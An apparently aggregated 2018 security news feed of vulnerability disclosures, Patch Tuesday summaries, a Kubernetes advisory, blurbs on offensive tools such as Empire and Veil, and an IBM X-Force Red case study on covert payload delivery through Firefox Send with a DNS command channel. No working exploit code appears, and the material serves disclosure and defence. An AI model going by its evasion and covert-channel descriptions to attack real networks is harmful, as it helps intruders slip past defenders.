  • 33818: HTTP: Microsoft PowerPoint Use-After-Free Vulnerability
  • 33819: HTTP: Microsoft Internet Explorer Use-After-Free Vulnerability
  • 33820: HTTP: Microsoft Windows Kernel Use-After-Free Vulnerability
  • 33822: HTTP: Microsoft Windows win32kfull.sys Integer Overflow Vulnerability

The post December Patch Tuesday: Year-End Batch Addresses Win32k Elevation of Privilege and Windows DNS Server Vulnerabilities appeared first on .



TrendLabs Security Intelligence Blog

Vulnerability Spotlight: Adobe Acrobat Reader DC text field remote code execution vulnerability


Aleksandar Nikolic of Cisco Talos discovered this vulnerability.

Executive summary

Adobe Acrobat Reader DC contains a vulnerability that could allow an attacker to remotely execute code on the victim’s machine. If the attacker tricks the user into opening a specially crafted PDF with specific JavaScript, they could cause heap corruption. The user could also trigger this bug if they open a specially crafted email attachment.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC text field value remote code execution vulnerability (TALOS-2018-0704/CVE-2018-19716)

Adobe Acrobat Reader supports embedded JavaScript in PDFs to allow for more user interaction. However, this gives the attacker the ability to precisely control memory layout, and it poses an additional attack surface. If the attacker tricks the user into opening a PDF with two specific lines of JavaScript code, it will trigger an incorrect integer size promotion, leading to heap corruption. It’s possible to corrupt the heap to the point that the attacker could arbitrarily execute code on the victim’s machine.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Adobe Acrobat Reader DC 2019.8.20071 is impacted by this vulnerability.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48293, 48294

Microsoft Patch Tuesday — December 2018: Vulnerability disclosures and Snort coverage


Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 38 vulnerabilities, nine of which are rated “critical” and 29 that are considered “important.” There are no “moderate” or “low” vulnerabilities in this release.

The advisories cover bugs in the Chakra scripting engine, several Microsoft Office products and the Microsoft Internet Explorer web browser.

For coverage of these vulnerabilities, check out our Snort blog post on this week's rule update.

Critical vulnerabilities


Microsoft disclosed nine critical vulnerabilities this month, which we will highlight below.

CVE-2018-8583, CVE-2018-8617, CVE-2018-8618, CVE-2018-8624 and CVE-2018-8629 are all memory corruption vulnerabilities in the Chakra scripting engine that could allow an attacker to execute code on the victim machine remotely. All of the bugs lie in the way the scripting engine handles objects in memory in the Microsoft Edge web browser. An attacker could exploit these vulnerabilities by tricking a user into visiting a web page using Microsoft Edge, or by tricking them into clicking on specially crafted content on other sites that accept user-created content.

CVE-2018-8540 is a remote code injection vulnerability in the Microsoft .NET framework. An attacker can exploit this flaw by passing a specific input to an application utilizing vulnerable .NET methods. If successful, the attacker could take control of an affected system.

CVE-2018-8626 is a remote code execution vulnerability that exists in Windows DNS servers when they fail to properly handle requests. An attacker could run arbitrary code on an affected system if they exploit the vulnerability by sending malicious requests to a Windows DNS server. Windows servers that are configured as DNS servers are susceptible to this vulnerability.

CVE-2018-8631 is a remote code execution vulnerability in Internet Explorer. The bug lies in the way the web browser accesses objects in memory. An attacker could exploit this bug by tricking a user into visiting a specially crafted, malicious web page in Internet Explorer. If successful, the attacker could execute arbitrary code in the context of the current user.

CVE-2018-8634 is a memory corruption vulnerability in the Microsoft Edge that exists when the web browser improperly handles objects in memory. An attacker who successfully exploits this flaw by tricking a user into visiting a malicious, specially crafted web page could gain the ability to execute arbitrary code on the machine in the context of the current user.

Important vulnerabilities

This release also contains 29 important vulnerabilities, eight of which we will highlight below.

CVE-2018-8597 and CVE-2018-8636 are remote code execution vulnerabilities in Microsoft Excel that exist when the software fails to properly handle objects in memory. An attacker can exploit these bugs by tricking the user into opening a specially crafted Excel file, either via the web or as an email attachment. If successful, the attacker could gain the ability to execute arbitrary code on the system in the context of the current user.

CVE-2018-8587 is a remote code execution vulnerability in Microsoft Outlook that exists when the software fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a specially crafted email attachment while using the Outlook client. If successful, the attacker could use a specially crafted file to perform actions in the security context of the current user. For example, the file could act on behalf of the logged-on user with the same permissions as the current users.

CVE-2018-8590 is a remote code execution vulnerability in Microsoft Word that exists when the software fails to properly handle objects in memory. An attacker could exploit this vulnerability by tricking the user into opening a malicious, specially crafted Word document, either via email, the web, or another vector.

CVE-2018-8619 is a remote code execution vulnerability that exists when the Internet Explorer VBScript execution policy improperly restricts VBScript in certain scenarios. An attacker could use this vulnerability to run arbitrary code with the permissions of the current user. A user could trigger this vulnerability if they visited a specially crafted web page using Internet Explorer.

CVE-2018-8625 is a remote code execution vulnerability in the VBScript engine. The vulnerability could corrupt memory in such a way that an attacker could execute code in the context of the current user. An attacker could trigger this flaw by tricking the user into visiting a specially crafted website on Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine.

CVE-2018-8628 is a remote code execution vulnerability in Microsoft PowerPoint that lies in the way the software processes objects in memory. An attacker could exploit this bug by tricking the user into opening a specially crafted, malicious PowerPoint file, which would eventually grant them the ability to execute code remotely in the context of the current user. The Preview Pane is not an attack vector this vulnerability — the user must open the file in PowerPoint.

CVE-2018-8643 is a remote code execution vulnerability that exists in the scripting engine handles objects in memory in Internet Explorer. An attacker could exploit this bug by tricking a user into visiting a specially crafted web page on Internet Explorer. Additionally, they could embed an ActiveX control marked “safe for initialization” in an application or Microsoft Office document that hosts the Internet Explorer rendering engine. If successful, the attacker could then corrupt memory in such a way that they could execute arbitrary code in the context of the current users.

The other important vulnerabilities in this release are:

Coverage 

In response to these vulnerability disclosures, Talos is releasing the following SNORTⓇ rules that detect attempts to exploit them. Please note that additional rules may be released at a future date and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org.

Snort rules: 45142, 45143, 48509, 48510, 48513 - 48520, 48531 - 48534, 48559, 48562

Latest Malware Strains Target Cloudera Hadoop for Bitcoin Mining and DDoS Attacks

­­

Security researchers discovered that several new malware strains are targeting known Cloudera Hadoop vulnerabilities.

The malware variants, including XBash and DemonBot, target Hadoop clusters that are connected to the internet and do not use Kerberos authentication, according to Cloudera. This can lead to certain exploits such as bitcoin mining and distributed denial-of-service (DDoS) attacks, which can create significant negative performance impacts within client environments.

These vulnerability attacks can occur when your Cloudera Hadoop system is not properly configured and secured. For example, when Kerberos is not enabled clusterwide, your Hadoop clusters become yet another possible attack vector.

The good news is that the attack techniques in question are not sophisticated and utilize known exploits, meaning organizations can protect themselves by taking the right precautions.

Protect Yourself With Strong Kerberos Authentication

Countering such attacks requires the use of strong Kerberos authentication to identify the right access for privileged users. Without proper Kerberos authentication, any user can connect to Hadoop clusters, access the system and make bad choices.

To follow best practices, implement additional authentication steps to secure your Cloudera Hadoop clusters, including the following:

  • Secure default accounts and passwords.
  • Utilize Lightweight Directory Access Protocol (LDAP) authentication for Cloudera Manager.
  • Enable Sentry service using Kerberos.
  • Use a secure protocol such as Secure Sockets Layer (SSL) or Transport Layer Security (TLS).
  • Secure default ports.

How do you know whether or not your environment is at risk to begin with? That’s where vulnerability scans come into play.

How to Identify if Your Cloudera Hadoop Clusters Are Affected

Vulnerability assessment solutions for Cloudera Hadoop can provide critical insight into your environment to help mitigate potential attacks. Advanced tools offer security checks and hardening rules to help customers secure their Hadoop clusters, provide rules to help identify Hadoop-specific vulnerabilities, and list detailed recommendations to fix and resolve the vulnerabilities.

To use vulnerability assessment tests to check whether a Cloudera authentication parameter is appropriately set to Kerberos — which is strongly recommended by Cloudera — an organization should take the following steps:

  1. Leverage a vulnerability assessment solution to run the following test: “Authentication method set to Kerberos.”
  2. If a cluster is properly configured, it will pass the test. Multiple systems can be connected to check for this test and get visibility into configuration statuses in minutes.
  3. After running the tests, organizations should attend to the clusters that did not pass. Note that such vulnerabilities can only be addressed with proper configuration, not by simply applying the latest security patches.
  4. Once the configurations have been updated and all nodes authenticate using Kerberos, the problem will be resolved.

As these recent attacks illustrate, vulnerability assessment is a critical piece of any comprehensive data protection program. Last year alone, more than 2 billion records were exposed due to misconfigurations — a number that could have been drastically reduced if teams had been leveraging vulnerability scanning tools.

Source: Cloudera

The post Latest Malware Strains Target Cloudera Hadoop for Bitcoin Mining and DDoS Attacks appeared first on Security Intelligence.

Zero-Day Flash Player Vulnerability Fixed After Being Exploited In the Wild

Adobe has once again patched a serious flaw in the Flash Player that has been exploited in the wild. This

Zero-Day Flash Player Vulnerability Fixed After Being Exploited In the Wild on Latest Hacking News.

Yoast SEO 9.1 Vulnerability Could Allow Command Execution

A few days ago, a researcher discovered a serious security flaw in Yoast plugin. This Yoast SEO 9.1 Vulnerability could

Yoast SEO 9.1 Vulnerability Could Allow Command Execution on Latest Hacking News.

massExploitConsole – An Open Source Tool For Exploiting Known Vulnerabilities

MassExploitConsole is a python based easy-to-use cli tool for executing exploits. It has a collection of exploits to execute, built-in

massExploitConsole – An Open Source Tool For Exploiting Known Vulnerabilities on Latest Hacking News.

Brutex – Open Source Tool for Brute Force Automation

Brutex is a shell based open source tool to make your work faster. It combines the power of Nmap, Hydra

Brutex – Open Source Tool for Brute Force Automation on Latest Hacking News.

Days After Massive Breach, Marriott Customers Await Details

Nearly a week after Marriott disclosed a massive breach of its Starwood reservation system, customers complain that the company has not communicated with them to tell them whether they are affected. Marriott says it is sending “rolling” emails to hundreds of millions of victims. An estimated 500 million Marriott International customers...

Read the whole entry... »

Related Stories

Taking Action to Secure Our IBM Cloud Kubernetes Service Against Recent Kubernetes Security Vulnerabilities

This post originally appeared on the IBM Cloud blog and is being shared with permission.

What’s happening?

We’re taking action to secure our IBM Cloud Kubernetes Service against the recent Kubernetes security vulnerabilities.

IBM Cloud Kubernetes Service is affected by the following vulnerabilities that, in some cases, allow unauthorized access to Kubernetes and/or trusted user privilege escalation.

Vulnerability Details

Affected Products and Versions

  • Affected components: Kubernetes API server
  • Affected versions:
    • Kubernetes versions 1.0.x through 1.9.x
    • 1.12.0-1.12.2 (fixed in v1.12.3)
    • 1.11.0-1.11.4 (fixed in v1.11.5)
    • 1.10.0-1.10.10 (fixed in v1.10.11)
    • 1.9.x and 1.8.x (update to v1.10.11)
    • 1.7 (update to 1.9.x and then update to 1.10.11)
    • 1.5 (unsupported, no migration path)

What do I need to know?

This exposure affects your IBM Cloud Kubernetes cluster master only, there is no exposure to your IBM Cloud Kubernetes Workers.

There are two exploits as part of this vulnerability:

Vulnerability 1: Authenticated and unauthenticated requests can provide full admin access to Kubernetes API Server.

  • Affected users: This only affects users with aggregated API servers.
    • 1.11 and earlier: IBM Cloud Kubernetes Service does not deploy any aggregated API servers in versions 1.11 and earlier. You will not be impacted unless you have deployed your own aggregated API server.
    • 1.12: All users are affected since all clusters contain the metrics-server, which is an aggregated API server affected by this vulnerability.

Vulnerability 2: Authenticated users with specific permissions to exec/attach/portforward API calls can be escalated to perform any API request against the kubelet API on the node specified in the pod spec.

  • Affected users: All IBM Cloud Kubernetes Service clusters are affected by this vulnerability.

We are releasing updates for all supported releases of IBM Cloud Kubernetes Service this week. Then, all supported clusters will auto-update to remediate the vulnerabilities during the next few days.

How do I mitigate the issue?

If you are on a supported release, then you don’t need to do anything, your IBM Cloud Kubernetes Cluster Master will be updated automatically.

All supported IBM Cloud Kubernetes Service clusters at version 1.10 and later will be updated automatically to address this security flaw. If you find that your cluster has not been automatically updated over the next few days, please contact IBM Support.

Customers running unsupported IBM Cloud Kubernetes versions must upgrade the affected clusters to a supported version 1.10.11, 1.11.5, 1.12.3, or later when these versions are released by IBM.

Refer to https://cloud.ibm.com/docs/containers/cs_versions.html for more information about Kubernetes versions.

You do not need to update your workers for this exposure, we do recommend that you always stay current with your workers to ensure you are not vulnerable to other exposures.

How do I check my version?

To see which Kubernetes versions the IBM Cloud Kubernetes Service has released:
ibmcloud ks kube-versions

To see which version your clusters are currently using:
ibmcloud ks clusters

What about unsupported clusters?

For 1.9.x or 1.8.x, you must update your cluster to a supported release:
ibmcloud ks cluster-update --cluster <clustername> --kube-version 1.10

For 1.7.x, you must first update to 1.9 and then update to a supported release:

  1. Run: ibmcloud ks cluster-update --cluster <clustername> --kube-version 1.9
  2. Confirm that the update completed successfully by checking the Kubernetes version.
  3. Run: >ibmcloud ks cluster-update --cluster <clustername> --kube-version 1.10

Questions or comments

Please join us on our public Slack channel at https://ibm-container-service.slack.com or raise a support ticket if you have any issues.

The post Taking Action to Secure Our IBM Cloud Kubernetes Service Against Recent Kubernetes Security Vulnerabilities appeared first on Security Intelligence.

Researchers: GDPR Already Having Positive Effect on Cybersecurity in EU

The General Data Privacy Regulation (GDPR) seems to already be having a positive effect on the state of cybersecurity in Europe less than seven months after it was enacted, showing that policy indeed can have a direct effect on organizations' security practices, security researchers said.

The post Researchers: GDPR Already Having Positive Effect...

Read the whole entry... »

Related Stories

Russian Hospital Targeted With Flash Zero-Day After Kerch Incident

Security updates released by Adobe on Wednesday for Flash Player patch two vulnerabilities, including a critical flaw exploited by a sophisticated threat actor in attacks aimed at a healthcare organization associated with the Russian presidential administration. The attack may be related to the recent Kerch Strait incident involving Russia and Ukraine.

read more

Kalitorify – Open Source Tool to Run Kali Linux Traffic Through Tor

Kalitorify is a shell based script for Kali Linux. It uses iptables and TOR to create a transparent proxy. In

Kalitorify – Open Source Tool to Run Kali Linux Traffic Through Tor on Latest Hacking News.

SecurityWeek RSS Feed: M2M Protocols Expose Industrial Systems to Attacks

Some machine-to-machine (M2M) protocols can be abused by malicious actors in attacks aimed at Internet of Things (IoT) and industrial Internet of Things (IIoT) systems, according to research conducted by Trend Micro and the Polytechnic University of Milan.

read more



SecurityWeek RSS Feed

IBM Db2 Vulnerabilities Left IBM Database Installations At Risk Of Hacks

IBM patched a couple of serious vulnerabilities in the previous week in their Db2 database installations. These IBM Db2 vulnerabilities

IBM Db2 Vulnerabilities Left IBM Database Installations At Risk Of Hacks on Latest Hacking News.

Vulnerability Spotlight: Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability


Brandon Stultz of Cisco Talos. of Cisco Talos discovered these vulnerabilities.

Executive summary

Today, Cisco Talos is disclosing a command injection vulnerability in Netgate pfSense system_advanced_misc.php powerd_normal_mode. pfSense is a free and open source firewall and router that also features unified threat management, load balancing, multi WAN, and more.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Netgate to ensure that these issues are resolved and that an update is available for affected customers.


Vulnerability details

Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4019)

This command injection vulnerability in Netgate pfSense is due to lack of sanitization on the 'powerd_normal_mode' parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_normal_mode' POST parameter. 

For more information on this vulnerability, read the full advisory here.


Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4020)

A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization on the 'powerd_ac_mode'parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_ac_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.

Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4021) 

A command injection vulnerability in Netgate pfSense exists due to the lack of sanitization on the powerd_battery_mode', parameter in POST requests to 'system_advanced_misc.php'. When processing requests to '/system_advanced_misc.php', Netgate pfSense firewall does not properly sanitize the 'powerd_battery_mode' POST parameter.

For more information on this vulnerability, read the full advisory here.

Conclusion

Cisco Talso tested and confirmed that Netgate pfSense CE 2.4.4-RELEASE is affected by these vulnerabilities.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48178

Sennheiser Headphones Vulnerability Could Allow HTTPS Site Spoofing

Sennheiser has recently patched a serious vulnerability in its headphone software. As discovered by the researchers, the vulnerability could allow

Sennheiser Headphones Vulnerability Could Allow HTTPS Site Spoofing on Latest Hacking News.

Webex Meetings Desktop App Vulnerability Existed Even After Patch

Last month, Cisco patched a command injection vulnerability in its Webex Meeting App. The vulnerability could allow arbitrary command execution

Webex Meetings Desktop App Vulnerability Existed Even After Patch on Latest Hacking News.

Hackers Could Exploit A Zoom App Vulnerability To Disrupt Conferences

The customers of Zoom conferencing app need to update their apps at the earliest to protect themselves from hackers. As

Hackers Could Exploit A Zoom App Vulnerability To Disrupt Conferences on Latest Hacking News.

Another Zero-Day Vulnerability Hits NUUO Surveillance Cameras

A couple of months ago, a zero-day vulnerability, named Peekaboo, threatened NUUO surveillance cameras. The vulnerability could allow an attacker

Another Zero-Day Vulnerability Hits NUUO Surveillance Cameras on Latest Hacking News.

Manipulating Digital Mammograms Via Artificial Intelligence May Cause Misdiagnosis

Mammography has been a critical procedure for diagnosing breast cancer. Yet, at the same time, the exposure to radiations has

Manipulating Digital Mammograms Via Artificial Intelligence May Cause Misdiagnosis on Latest Hacking News.

EternalSilence – New Variant Of UPnProxy Exploit Discovered Affecting 45,000 Routers

Earlier this year, Akamai researchers discovered a UPnProxy attack targeting thousands of routers. Now, after so many months, they have found

EternalSilence – New Variant Of UPnProxy Exploit Discovered Affecting 45,000 Routers on Latest Hacking News.

Knock – Open Source Subdomain Scanner Tool

Knock is a python based tool for enumerating subdomains on a targeted domain. You can use a custom wordlist and

Knock – Open Source Subdomain Scanner Tool on Latest Hacking News.

Empire – Open Source Post-Exploitation Agent Tool

Empire is regarded as one of the most useful frameworks by many penetration testers. It has many different powershell and

Empire – Open Source Post-Exploitation Agent Tool on Latest Hacking News.

Blazy – Open Source Modern Login Brute-forcer

I know what you are thinking, bruteforce doesn’t work anymore in many cases. However, Blazy is not just another brute-force

Blazy – Open Source Modern Login Brute-forcer on Latest Hacking News.

Veil-Framework – Open Source Tool to Bypass Common Anti-Virus Solutions

Based on python, the Veil-Framework is one of the most popular tools for Anti-Virus evasion. You can generate many different

Veil-Framework – Open Source Tool to Bypass Common Anti-Virus Solutions on Latest Hacking News.

Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red

As you may know, IBM X-Force Red is IBM Security’s penetration testing team. The team features professional, world-class testers who help organizations find and manage their security vulnerabilities on any and all platforms, including software and hardware devices. Our motto is “hack anything to protect everything.”

This post features a case study from IBM X-Force Red that shows how we ran into trouble on a black-box penetration testing assignment, worked against a well-prepared blue team, and overcame the obstacles to ultimately establish a solid adversarial operation. Let’s take a closer look at what we did to get through security and, more importantly, what your team can do to better secure your organization in an ever-evolving adversarial landscape.

A Tale of an Undeliverable Payload

On one of our red team’s recent engagements with a customer’s blue team, we were tasked with delivering a malicious payload to network users without setting off security controls or alerting the defensive team.

As a first attempt, we sent a phishing email to feel out the level of awareness on the other side. The email message was rigged with our malicious payload, for which we selected the attachment type and a lure that would appear credible. However, the blue team on the other side must have been lying in wait for suspicious activity. Every one of our emails was delivered, but our payloads were not. The payloads did not call home to the control server we had set up, and we started getting visits from the defensive team in the form of an anti-malware sandbox.

Within minutes, additional sandboxes hit on our command and control (C&C) server’s handler, and soon more than 12 security vendor clouds were feasting on the payload. We understood at that point that our payload had been detected, analyzed and widely shared by the blue team, but since this was a black-box operation, we had little way of knowing what went wrong after sending out our rigged emails.

If the Phish Fails, Send in the Fox

Going back to the drawing board, we realized that we must have triggered the blue team’s dynamic malware detection systems and controls. We had to find a new way to deliver the payload in a more concealed manner — preferably encrypted — and to have it detonate only when it reached its final destination to prevent premature discovery.

To do so, we had to overcome some hurdles, including:

  • Sidestepping traffic inspection controls;
  • Opening a siloed channel to send information from outside into the organizational networks;
  • Decreasing repeatable sampling of our externally hosted content;
  • Minimizing the chance of attribution at the initial visit/download/delivery stages; and
  • Bypassing URL inspections.

Some creative thinking summoned a good candidate to help us overcome most controls, mostly because it is a legitimate service that people use in daily interactions: Mozilla’s Firefox Send (FFSend).

Before we continue to describe the use of FFSend, we would like to note here that it is a legitimate tool that can be used safely, and that it was not compromised. We also disclosed information in this blog to Mozilla ahead of its publication and received the company’s support.

The Right Fox for the Job

FFSend is a legitimate file transfer tool from Mozilla. It has several interesting features that make it a great tool for users, and when files are sent through, its developers indicate it will generate “a safe, private and encrypted link that automatically expires to ensure your stuff does not remain online forever.” This makes FFSend a useful way to send private files between people in a secure manner.

To send a file, the sender, accessing FFSend via a browser, uploads the file he or she wants to share with the recipient through a simple web interface. He or she receives a URL for a shared link and can send it to the recipient. The recipient visits the shared link and downloads the file, at which point the FFSend service “forgets” the link and removes shared content from the server.

Red Team Research

Figure 1: Basic flow of events using FFSend

From our red team’s perspective, FFSend was a good fit for sending encrypted files. Let’s see how it answered some of the needs we defined.

FFSend allows for large file sizes up to 1 GB, which is large enough an allowance to both send a payload and exfiltrate data. This answered our need for a siloed, covert channel into the organization. It would encrypt and decrypt the payload for us with an AES-GCM algorithm directly in the internet browser, yet we won’t have to deal with any key generation or distribution. The payload would evade the inspection of intercepting proxies that can unwrap Transport Layer Security (TLS), and would remain private and won’t be shared with any party along the way, including Mozilla.

Red Team Payload Delivery

Figure 2: Schematic view of FFSend’s automated encryption

Since firefox.com is a trusted domain on most organizational controls, we gain yet another advantage by using FFSend. We won’t have to labor to set up a fake site that would raise suspicion, and we can still get our file’s link across to the recipient. The trusted Firefox domain is also more likely to slip through URL inspection and anti-phishing controls, as well as blacklists that organizations deploy to catch malicious content coming from rogue resources.

Red Team Research

Figure 3: FFSend is considered a trusted source

As for reducing repeated sampling of the payload, we get that as well by setting a strict one-time-only limit on the number of times our FFSend link can be accessed after it’s generated, avoiding the sandbox attempts and threat sharing. Moreover, FFSend automatically expires links after 24 hours, which effectively makes the path to our payload self-destruct if the target has not opened it. Self-destruction is also featured on FFSend’s application program interface (API), so it can also be ordered ad hoc after a link is sent but before its default expiration.

Red Team Research

Figure 4: FFSend’s link expiration and self-destruct schema

Avoiding attribution is also easier when using a legitimate service that implements ephemeral storage of the files it delivers. Using such a service allowed us to avoid any links back to our testers, since there was no account required to send a file, nor was information on the owner of the encrypted data sent, required or kept.

This meant our ownership of the malicious file would be anonymous, though there would still be a tie to our originating IP address and browser fingerprints. With most information concealed, we deemed this level of anonymity good enough for the desired outcome.

Red Team Payload Delivery

Figure 5: No sender identity required, no attribution links back to red team

Setting Up a Communications Channel

With the file sending issue resolved, we still needed a covert communication channel to help us establish an ongoing operation without being ousted by the blue team.

To set up a communications channel, we did not wish to start from scratch. We decided to use FFSend to make it work as the siloed, covert channel we needed. That was one problem solved, but to coordinate the sending and receiving of data over that channel, we would also need a side channel of communications to avoid inspection and detection.

Communication gets inspected by a number of security controls, so it is essential that we blend in with the environment. To do that, we would have to choose a communication protocol that would allow us to look like everyone else on the network. Looking at the typical choices — Hyper Text Transfer Protocol Secure (HTTPS), Internet Control Message Protocol (ICMP) and Domain Name System (DNS) protocols — we selected DNS for its decent packet capacity and overall better chance of blending in with legitimate user traffic.

DNS fit our need to implement a data channel to FFSend. Also, a command channel can offload to DNS. To make everything work together, DNS record content could be encrypted with the same FFSend shared key used to post the data link, keeping things consistent.

In our command protocol, we can accommodate short instructions and differentiate between the types of requests we want to task agents with, to run or receive responses on. For example, we can encode instructions such as fetch me <file> or execute <command>. The agent would then carry out the request and post the results over our FFSend data channel.

On the wire side, channel interaction will look like a well-formed dynamic DNS request, separate from an HTTPS channel used for data. This split would ensure avoiding traffic correlation.

The Foxtrot Control Server Rises

Once we knew how to set up our covert communications, we set up a rogue control server and named it Foxtrot. Foxtrot was a mechanism we used to facilitate communication between any number of the remote agents.

Having created Foxtrot with a modified FFSend service and a DNS side channel, IBM X-Force Red testers were able to push the initial payload to unsuspecting recipients. The payload circumvented dynamic defenses, helped our red team gain a foothold in the environment and established persistence to freely move data across intercepting proxies. We were also able to execute commands on compromised hosts, even when the defensive team had its security controls and monitoring turned on.

A Word to the Wise Defender

Red teams have the advantage of only needing to find one way in, while blue teams are tasked with securing all ways in and out. This one-sided advantage means that defenders have to keep a close eye on attack tactics, techniques and procedures (TTPs) and expect encryption and covert side channels to challenge existing automated controls.

After having achieved our goals, we came away with some tips for defenders that can help security teams prepare for the TTPs we used.

  • Expect to see the use of client-side encryption gain more prominence in adversarial workflows, and choose security controls accordingly.
  • Expect to see split-data and command channels grow in popularity among attackers, because this technique can help break automated analysis patterns employed by traditional security tools. Defenders should look into behavioral, heuristics-based detection, augmented by a fully staffed security operations center (SOC) to continuously detect split-channel operations.
  • X-Force Red encourages defensive teams to test their incident response (IR) processes against simulated attacker workflows that employ custom tooling capabilities.

What can teams do right now to get ahead of determined threat actors? Step up your security with pre-emptive action in the shape of professional penetration testing, and make sure the scope of the testing gradually covers both hardware and software. You should also consider adopting cognitive solutions to augment analysts’ capabilities and scale up as attacks grow more frequent and complex.

Listen to the X-Force Red in Action podcast series

The post Phish or Fox? A Penetration Testing Case Study From IBM X-Force Red appeared first on Security Intelligence.

Synthetic Fingerprints Make Biometric/Fingerprint Recognition Systems Vulnerable

From smartphone lock systems to identity verification, people consider fingerprint scans a viable method of security. However, scientists have figured

Synthetic Fingerprints Make Biometric/Fingerprint Recognition Systems Vulnerable on Latest Hacking News.

mitmAP – An Open Source Tool to Create a Fake Access Point and Sniff Data

The Evil Access Point (AP) attack has been around for a long time. There are several ways to create this

mitmAP – An Open Source Tool to Create a Fake Access Point and Sniff Data on Latest Hacking News.

SecurityWeek RSS Feed: DoS Vulnerabilities Impact Linux Kernel

Two recently disclosed Linux kernel vulnerabilities that remain unpatched could be exploited for local denial-of-service (DoS).

The flaws, both which were made public last week, impact Linux kernel 4.19.2 and previous versions. Both represent NULL pointer deference bugs that can be exploited by local attackers and are considered Medium severity. 

read more



SecurityWeek RSS Feed

U.S. Postal Service API Flaw Exposes Data of 60 Million Customers

The United States Postal Service (USPS) has fixed an API flaw that potentially exposed data on 60 million customers. A researcher reported the flaw to USPS more than a year ago; but it wasn't until security blogger Brian Krebs contacted the organization this month that it took any action.

read more

Frustrated Fallout 76 Player Cursed With Permanent God Mode Due To A Bug

Game glitches, particularly those inadvertently endowing benefits to the players are usually loved. For instance, the bug in the Red

Frustrated Fallout 76 Player Cursed With Permanent God Mode Due To A Bug on Latest Hacking News.

Microsoft Fixed Outlook 2010 Crashes Triggered By November Patch Tuesday

While an update bundle supposedly addresses flaws, Microsoft November Patch Tuesday didn’t seem so good for users. After the update,

Microsoft Fixed Outlook 2010 Crashes Triggered By November Patch Tuesday on Latest Hacking News.

Apache Hadoop YARN NodeManager Daemon Falls Prey To Zip Slip Vulnerability

A few months ago, researchers discovered the Zip Slip vulnerability that could trigger remote code execution attacks. As disclosed at

Apache Hadoop YARN NodeManager Daemon Falls Prey To Zip Slip Vulnerability on Latest Hacking News.

VMWare Patched Critical Vulnerability In Workstation And Fusion

Recently, VMware patched critical vulnerability affecting its Workstation and Fusion software. The bug could allegedly allow an attacker to execute

VMWare Patched Critical Vulnerability In Workstation And Fusion on Latest Hacking News.

Ethereum Vulnerability Allowed Minting GasToken To Sweep Crypto Exchanges

A recently discovered Ethereum vulnerability could have allowed hackers to drain a huge amount of money from crypto exchanges. The

Ethereum Vulnerability Allowed Minting GasToken To Sweep Crypto Exchanges on Latest Hacking News.

Adobe Patched A Critical Flash Player Vulnerability Disclosed Publicly

Adobe Flash Player vulnerabilities and their subsequent patches are no surprise to us. Once again, Adobe has patched a critical

Adobe Patched A Critical Flash Player Vulnerability Disclosed Publicly on Latest Hacking News.

Xerosploit – Open Source Toolkit For Man In The Middle Attacks

Xerosploit is a python-based toolkit for creating efficient Man In The Middle attacks which combines the power of bettercap and

Xerosploit – Open Source Toolkit For Man In The Middle Attacks on Latest Hacking News.

Facebook And Instagram Went Down Due To A Server Bug

Facebook makes it into the news once again for troubling users globally. Supposedly, Facebook users have faced trouble with Instagram

Facebook And Instagram Went Down Due To A Server Bug on Latest Hacking News.

WordPress Exploit in GDPR Plugin Puts 100,000 Websites at Risk

More than 100,000 websites were affected by a vulnerability in a WordPress plugin that was designed to help site owners comply with the General Data Protection Regulation (GDPR).

Researchers from Wordfence also reported evidence of attacks in which malicious third parties installed their own administrator accounts on various sites. Though the full scope of how cybercriminals might use this access is unknown, it could enable them to install malware and hijack sites to use in phishing schemes.

The plugin, called WP GDPR Compliance, was initially removed from a plugin repository after the WordPress exploit was discovered. A patched version has since been made available.

WordPress Exploit Enables Attackers to Hijack Websites

WP GDPR Compliance was created to address some requirements in the legislation around requests for data access and how data is deleted from WordPress-hosted sites. A bug in the system that registers new users, however, enables threat actors to create their own accounts. This gives them full privileges to control what happens on the site and lets them cover their tracks by disabling the same feature and locking out legitimate site owners.

A second use of the WordPress exploit involves manipulating WP-Cron, the plugin’s task scheduler, which enables attackers to create other entry points through which to take control of a site.

This WordPress exploit affects WP GDPR Compliance versions up to and including 1.4.2. The patched version, 1.4.3, is now available within the WordPress plugin repository.

How Can Site Owners Protect Their Accounts?

Along with theme directories, plugins are a highly popular avenue for attack on WordPress sites. According to IBM X-Force, for example, directory references to “plugins” were found in close to 40 percent of the WordPress URLs where malware or other files had been discovered.

The risks associated with the WP GDPR Compliance plugin reinforce the importance of proactive patching. However, security experts also suggest proactively scanning such sites for potential anomalies, which could include changes in files or, in this case, new admin accounts.

Sources: WordFence, WeLiveSecurity

The post WordPress Exploit in GDPR Plugin Puts 100,000 Websites at Risk appeared first on Security Intelligence.

